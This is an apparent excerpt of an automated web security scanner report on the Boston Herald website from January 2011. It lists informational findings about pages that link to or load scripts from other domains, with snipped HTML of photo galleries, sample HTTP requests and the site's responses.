<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4829','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/fed6dc_APTOPIX_Ravens_Steelers_Football__trose@heraldinteractive.com_15.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4828','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/92b48a_011511bruinsjw02.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4826','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/c33a6c_011411celticssc15.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4825','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/9da8b3_011411patstf18.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4819','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110114/stp/603f10_011311patsmw05.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4818','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110114/stp/de77f1_011311bruinsms07.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4812','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/be66c8_011211celticsms04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4808','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/2a53c5_PatsFansB011211.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4805','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/e563d8_011111bruinsmw04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4801','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/440065_011111patsjw04.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4799','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/c17ee9_011011celtsmw006.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4792','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110108/stp/f40e45_010711celticssc13.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4791','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110108/stp/fad0b9_010611crawfordnl02.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Carl Crawford works out in Houston"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Carl Crawford works out in Houston">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4789','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110107/stp/f1d006_010511crawfordnl12.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\At home with Carl Crawford"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\At home with Carl Crawford">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4785','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/11080d_010511celticsms05.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4777','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110104/stp/ee1234_010311celtsmw021.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4774','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110102/stp/940585_010211pats027.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4772','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/d1d0a1_123110patriotsDR03.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4770','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/467227_123110celticsmh15.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4763','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/a92882_123010bchoopsms05A.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Boston College beats Northeastern 80-67"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Boston College beats Northeastern 80-67">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4761','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/5d7332_123010patsjw09.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4866','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110125/stp/61e5f9_tgrit.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4859','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110123/stp/873e80_012211caesarap09.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4847','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110120/stp/ef8a2d_KateA012011.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4832','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/e02b29_460f81914ea92f01e20e6a7067008cba.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4810','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/e9644b_fash2.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Patriot fashion"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Patriot fashion">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4786','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/c846a1_010511cirquear01.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Cirque du Soleil"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Cirque du Soleil">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4783','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110105/stp/4df46a_010311skating03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Fashion on ice"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Fashion on ice">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4767','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/2d898c_120810princessnl05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\2010 in pictures"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\2010 in pictures">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4879','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/ed2891_012711hastynl05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Hasty Pudding"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Hasty Pudding">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4873','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110127/stp/ecbe1f_012610nkotbar04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\New Kids raid Fenway"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\New Kids raid Fenway">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4849','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110121/stp/1a0e4b_012011celtsnl03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Paul Pierce reads to students"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Paul Pierce reads to students">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4794','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110109/stp/d94239_010711folkap02.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4766','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/d99d87_123110firstnightsc04.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\First Night 2011"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\First Night 2011">Purchase</a>
...[SNIP]...
<div class="gutter_teaseInner" style="padding: 0px; padding-bottom:10px;" >

<img width="100%" src="http://multimedia.heraldinteractive.com/images/20110127/3057c6_Plow_01282011.jpg" />

<div style="padding: 0px 10px 0px 10px;">
...[SNIP]...
<p><a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/photo/?photo_name=3057c6_Plow_01282011" ><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mediacenter/btn_order_prints_yellow.png" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<li>
<a href="http://gallery.pictopia.com/bostonherald/"><h3>
...[SNIP]...
<div class="gutter_teaseInner">
<a href="http://gallery.pictopia.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/purchasePhotos.gif" /></a>
...[SNIP]...
<br />
<a href="http://gallery.pictopia.com/bostonherald/">Click here</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</body>


       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

7.13. http://www.bostonherald.com/mediacenter/video.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:58:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2589
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">


        <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js"></script>
...[SNIP]...

7.14. http://www.bostonherald.com/mediacenter/video.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2489
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

7.15. http://www.bostonherald.com/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains: